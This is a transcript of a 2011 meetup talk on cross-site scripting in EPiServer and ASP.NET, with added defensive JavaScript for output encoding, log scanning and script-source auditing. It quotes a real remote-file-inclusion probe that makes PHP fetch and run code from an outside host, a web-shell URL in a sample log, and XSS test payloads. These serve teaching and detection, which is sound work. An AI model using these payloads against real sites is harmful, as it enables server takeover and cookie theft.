XSS - Presented at EPiServer Meetup in Oslo 25th May 2011

    Presentation Transcript

    • XSS – Cross site scripting
      Oslo EPiServer Meetup #7 – 25th May 2011
      © Creuna
      Slide 1
    • Definition
      Cross site scripting (XSS) is a form of attack where the attacker is able to run arbitrary JavaScript code in a web page viewed by another user.
      XSS compromises the client side (the victim's browser), not the server.
      But depending on the nature of the web site it can be a serious security risk.
      Slide 2
    • Consequences
      XSS may be used to:
      - Steal session cookies
      - Perform any action that the attacked user has rights to do, possibly without the user knowing
      - Display false or modified content
      - Spread like a software worm, for instance on a social network site: a user posts the attacking code, which infects their friends, they post it on, and so on
      Slide 3
    • Two types of XSS
      Non persistent (reflected):
      A user follows a malicious link or submits a form from a dangerous web site, email, etc. The vulnerable web site writes the XSS attack into the response, and only this user is affected.
      Persistent (stored):
      The XSS attack code is stored on the vulnerable web site, for instance in a user comment. All subsequent users of the web site may be exposed to the XSS attack.
      Slide 4
    • Where does the XSS attack come from?
      All content from insecure sources is potentially dangerous:
      - Form submissions
      - URLs
      - All other sources: RSS feeds, integrated systems, etc.
      Slide 5
    • Form submissions
      Dangerous content may come through POST variables.
      Remember that POST requests do not necessarily originate from a form on a page you served the user; an attacker may craft a web page or request targeting your web site.
      (Demo showed a simple ASP.NET form writing a submitted text back to the page on postback. By default dangerous POST variables result in an exception in ASP.NET: request validation throws an HttpRequestValidationException, "A potentially dangerous Request.Form value was detected from the client". So we are covered, right? The next demo showed the same principle in a minimally modified EPiServer demo site, and the XSS attack was successful. EPiServer turns off ASP.NET's input validation in its default configuration. In ASP.NET this is the validateRequest attribute of the pages element in web.config, or the ValidateRequest attribute of the Page directive, so that is the first setting to check in your own site.)
      Slide 6
    • URL input
      Do you write the value of Request.Url back to your response?
      Yes, even ASP.NET itself does that: the action attribute of the server-side form is rendered from the request URL.
      (Demo showed using a URL with XSS in it in a standard ASP.NET web site, and we got an exception like with the POST attack, since request validation covers the query string as well as form fields. EPiServer proved vulnerable again.)
      Slide 7
    • EPiServer
      ASP.NET is normally well secured against XSS by its request validation.
      But EPiServer turns this feature off by default.
      We must always give external input an extra thought in EPiServer: ASP.NET's normal safety net is turned off!
      (Request validation is a blocklist heuristic on the input side; it is a safety net, not a substitute for encoding output, so the advice on the next slide applies even where it is on.)
      Slide 8
    • How do we secure ourselves against XSS?
      Always make sure to escape data from unsecure sources if you are going to write it to the response.
      This also applies to URLs, like Request.Url.
      Escape for the context you write into: HTML text, an HTML attribute, a JavaScript string or a URL each need a different encoding. In ASP.NET the minimum is HttpUtility.HtmlEncode (Server.HtmlEncode) for HTML text and attribute values.
      Do not trust your own ability to foresee all scenarios, so do not write the code for this yourself.
      Use a well tested and reviewed framework.
      For instance Microsoft's AntiXSS, which has a separate method per context (HtmlEncode, HtmlAttributeEncode, JavaScriptEncode, UrlEncode): http://wpl.codeplex.com/
      Slide 9
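An added example, not code from the slides or from EPiServer, that models the demos of slides 6 and 7 and the fix of slide 9 in plain JavaScript instead of ASP.NET. A page handler echoes a POSTed field and the request URL into the response, first raw (the vulnerable demo) and then HTML-encoded, and a rough imitation of ASP.NET's request validation shows what the safety net catches. The request objects, the handler and the validation regex are assumptions made for illustration.

```javascript
// Added example (not from the original slides): echo untrusted input raw vs. encoded.

// HTML-encode text placed in element content or inside a double-quoted
// attribute; these five characters are the ones that can break out of either.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Rough approximation of ASP.NET request validation (assumption, not the real
// implementation): reject "<" followed by a letter, "!", "/" or "?", or "&#".
// Note that "1 < 2" passes, so this is a blocklist, not a guarantee.
function isPotentiallyDangerous(value) {
  return /<[a-zA-Z!\/?]|&#/.test(String(value));
}

// Render the page. `req` is a constructed request object ({ url, form }).
// encode=false reproduces the vulnerable demo; encode=true encodes every
// untrusted value, the form field AND the request URL.
function renderPage(req, encode) {
  const enc = encode ? htmlEncode : (v) => String(v);
  const name = req.form.name || '';
  return [
    '<html><body>',
    // Like ASP.NET, the form action is built from the request URL.
    `<form method="post" action="${enc(req.url)}" id="aspnetForm">`,
    '<input name="name">',
    '</form>',
    `<p>Hello ${enc(name)}</p>`,
    '</body></html>',
  ].join('\n');
}

// Run one request through the (imitated) validation gate and the page.
function handle(req, { validateRequest, encode }) {
  const values = [req.url, ...Object.values(req.form)];
  if (validateRequest && values.some(isPotentiallyDangerous)) {
    return { status: 500, body: 'HttpRequestValidationException: potentially dangerous value' };
  }
  return { status: 200, body: renderPage(req, encode) };
}

// Constructed attack requests: one through a POST field, one through the URL.
const postAttack = { url: '/default.aspx', form: { name: '<script>alert(document.cookie)</script>' } };
const urlAttack = { url: '/default.aspx?x="><script>alert(1)</script>', form: { name: 'Bob' } };

function demo() {
  return {
    // ASP.NET default: validation on, the payload never reaches the page.
    aspnetDefault: handle(postAttack, { validateRequest: true, encode: false }).status,
    // Validation off (the EPiServer default) and no encoding: script tag lands in the page.
    episerverRaw: handle(postAttack, { validateRequest: false, encode: false }).body.includes('<script>'),
    // Validation off but output encoded: the payload is inert text.
    episerverEncoded: handle(postAttack, { validateRequest: false, encode: true }).body.includes('<script>'),
    // Encoding must also cover the URL echoed into the form action.
    urlEncoded: handle(urlAttack, { validateRequest: false, encode: true }).body.includes('"><script>'),
  };
}

console.log(demo());
```

The same encoder is used for the attribute and the text node because the attribute is always double-quoted; an unquoted attribute, a JavaScript string or a URL parameter would each need its own encoding, which is why the slide recommends a library with one method per context.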
    • Are youusing PHP?
      With PHP, similar untrusted input may compromise the server side itself, because an include() of an attacker-controlled path can fetch and execute remote code.
      Real world example from one of our projects:
      <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif" id="aspnetForm">
      This attack would make the server run the PHP code in test.gif, which is not a picture but PHP code.
      The query string is URL-encoded three times over and decodes to _SERVER[DOCUMENT_ROOT]=http://bungalowsdemo.info/images/test.gif. It tries to overwrite $_SERVER['DOCUMENT_ROOT'] from the request (which relies on old PHP configurations with register_globals letting request data populate that entry), so that a script including a file relative to the document root fetches and executes test.gif instead: a remote file inclusion probe. The attack string is visible here because ASP.NET wrote the request URL back into the form's action attribute, the Request.Url echo from slide 7.
      The web site bungalowsdemo.info is probably unknowingly attacked and used to host the attack code.
      Slide 10
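An added example, not from the slides, that decodes the triple-encoded query string from the form action above and then scans web server log lines for the same remote-file-inclusion pattern. The log lines are constructed for illustration (only the first carries the slide's payload), and the two detection patterns, a parameter name targeting a PHP superglobal and a parameter value that is an absolute URL, are my own choice of heuristics, not the project's.

```javascript
// Added example (not from the original slides): decode and detect the RFI probe.

// URL-decode repeatedly until the text stops changing (the slide's payload is
// encoded three times), giving up on malformed sequences or after maxRounds.
function fullyDecode(text, maxRounds = 5) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return current; // malformed percent sequence: return what we have
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// Split a query string into [name, value] pairs, fully decoding each side.
function parseQuery(query) {
  return query.split('&').filter(Boolean).map((pair) => {
    const idx = pair.indexOf('=');
    const name = idx < 0 ? pair : pair.slice(0, idx);
    const value = idx < 0 ? '' : pair.slice(idx + 1);
    return [fullyDecode(name), fullyDecode(value)];
  });
}

// Heuristics (assumptions for this example): a parameter that tries to overwrite
// a PHP superglobal, or a parameter whose value is a remote URL to include.
const SUPERGLOBAL = /^(_SERVER|_GET|_POST|_COOKIE|_REQUEST|_FILES|_ENV|_SESSION|GLOBALS)\[/;
const REMOTE_URL = /^(https?|ftp):\/\//i;

// Inspect a request target (path plus query) and list the reasons it looks like a probe.
function inspectRequest(pathAndQuery) {
  const qmark = pathAndQuery.indexOf('?');
  if (qmark < 0) return { suspicious: false, reasons: [], params: [] };
  const params = parseQuery(pathAndQuery.slice(qmark + 1));
  const reasons = [];
  for (const [name, value] of params) {
    if (SUPERGLOBAL.test(name)) reasons.push(`superglobal overwrite: ${name}`);
    if (REMOTE_URL.test(value)) reasons.push(`remote URL in ${name}`);
  }
  return { suspicious: reasons.length > 0, reasons, params };
}

// Constructed Apache combined-format log lines (sample input, not real traffic).
const SAMPLE_LOG = [
  '10.0.0.7 - - [25/May/2011:10:12:01 +0200] "GET /no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '10.0.0.8 - - [25/May/2011:10:12:05 +0200] "GET /no/?page=2&sort=date HTTP/1.1" 200 7710 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [25/May/2011:10:12:09 +0200] "GET /index.php?inc=http://203.0.113.5/c99.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.8"',
];

// Pull the request target out of each combined-format line and inspect it.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    const result = inspectRequest(m[1]);
    if (result.suspicious) hits.push({ target: m[1], reasons: result.reasons });
  }
  return hits;
}

console.log(scanLog(SAMPLE_LOG));
```

Decoding until the text is stable matters because scanners layer the encoding precisely so that a single decode (what most log tools and naive filters do) still shows `%255b` rather than `[`.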
    • External script files
      Do you include external script files in your web site?
      For instance, do you use Google's/Microsoft's CDN for JavaScript?
      Real world example, web statistics tool:
      <script src="http://res.xtractor.no/x.js" type="text/javascript"></script>
      Slide 11
    • External script files
      If you reference external script files you give another domain/source the right to run JavaScript on your web site.
      Of course you can trust Google's or Microsoft's CDN to deliver proper code.
      But a different domain may be vulnerable to DNS attacks.
      An attacker may manipulate DNS on the local machine or network to deliver external scripts from a different source.
      If all referenced script files are from the same domain as the viewed web page you avoid this dependency: the third party's DNS, servers and security practices are no longer part of your attack surface.
      Note that the real weakness in the example is plain HTTP: an attacker who controls DNS or the network path can substitute any script fetched over http://, whoever hosts it. Load scripts over HTTPS, and where you must use a third-party CDN, a Subresource Integrity hash (the integrity attribute, which became available in browsers after this talk) pins the exact file.
      Slide 12
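An added example, not from the slides, implementing the check this slide suggests: list the script files a page loads and flag those that come from another origin or are fetched over plain HTTP (the second flag covers the caveat above, since a same-origin script over http:// is just as easy to substitute). The sample HTML and the page URL are constructed for illustration; the xtractor.no tag is the one quoted on slide 11.

```javascript
// Added example (not from the original slides): audit <script src> references.

// Find every external script and report its origin relative to the page.
function listScriptSources(html, pageUrl) {
  const page = new URL(pageUrl);
  // Matches <script ... src="..."> with double-quoted, single-quoted or bare values.
  const re = /<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const results = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const raw = m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
    let url;
    try {
      url = new URL(raw, page); // resolves relative and protocol-relative URLs
    } catch (e) {
      results.push({ src: raw, error: 'unparseable' });
      continue;
    }
    results.push({
      src: raw,
      origin: url.origin,
      sameOrigin: url.origin === page.origin,
      plainHttp: url.protocol === 'http:',
    });
  }
  return results;
}

// Keep only the references that widen the attack surface.
function auditScripts(html, pageUrl) {
  return listScriptSources(html, pageUrl).filter((s) => s.error || !s.sameOrigin || s.plainHttp);
}

// Constructed sample page: one same-origin script, the slide's statistics
// script over plain HTTP, a CDN script over HTTPS and an inline script.
const SAMPLE_HTML = `
<html><head>
<script src="/scripts/site.js" type="text/javascript"></script>
<script src=http://res.xtractor.no/x.js type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body></body></html>`;

console.log(auditScripts(SAMPLE_HTML, 'https://www.example.com/page'));
```

The regex is enough for an audit of your own templates; for arbitrary third-party HTML use a real parser, since script tags can be split across attributes and comments in ways a regex will miss.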
    • Questions?
      Slide 13